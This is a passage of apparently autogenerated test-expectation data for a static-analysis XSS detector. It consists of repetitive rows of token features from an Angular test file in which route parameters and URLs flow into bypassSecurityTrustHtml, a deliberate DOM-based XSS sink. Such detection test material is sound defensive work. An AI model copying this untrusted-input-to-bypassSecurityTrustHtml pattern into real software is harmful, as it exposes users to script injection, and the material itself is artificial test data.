sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:82 | this.ro ... eters.x | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:82 | this.ro ... eters.x | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:49:34:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:49:34:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:49:34:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:49:34:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:49:34:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:55:34:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:55:34:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:55:34:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:55:34:62 | snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:55:34:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:64:34:66 | url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:64:34:66 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:64:34:66 | url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:64:34:66 | url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:64:34:66 | url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:68:34:68 | 1 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:68:34:68 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:68:34:68 | 1 | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:68:34:68 | 1 | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:68:34:68 | 1 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:71:34:80 | parameters | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:71:34:80 | parameters | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:71:34:80 | parameters | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:71:34:80 | parameters | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:71:34:80 | parameters | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:82:34:82 | x | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:82:34:82 | x | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:82:34:82 | x | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:82:34:82 | x | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:82:34:82 | x | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | exceptional return of this.sa ... t('x')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | exceptional return of this.sa ... t('x')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | exceptional return of this.sa ... t('x')) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | exceptional return of this.sa ... t('x')) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | exceptional return of this.sa ... t('x')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | this.sa ... t('x')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | this.sa ... t('x')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | this.sa ... t('x')) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | this.sa ... t('x')) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:5:35:92 | this.sa ... t('x')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:10:35:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:10:35:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:10:35:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:10:35:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:10:35:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:20:35:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:20:35:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:20:35:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:20:35:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:20:35:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:66 | this.ro ... hot.url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:66 | this.ro ... hot.url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:66 | this.ro ... hot.url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:66 | this.ro ... hot.url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:66 | this.ro ... hot.url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:69 | this.ro ... .url[1] | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:69 | this.ro ... .url[1] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:69 | this.ro ... .url[1] | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:69 | this.ro ... .url[1] | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:69 | this.ro ... .url[1] | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:82 | this.ro ... eterMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:82 | this.ro ... eterMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:82 | this.ro ... eterMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:82 | this.ro ... eterMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:82 | this.ro ... eterMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:86 | this.ro ... Map.get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:86 | this.ro ... Map.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:35:44:35:86 | this.ro ... Map.get | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer 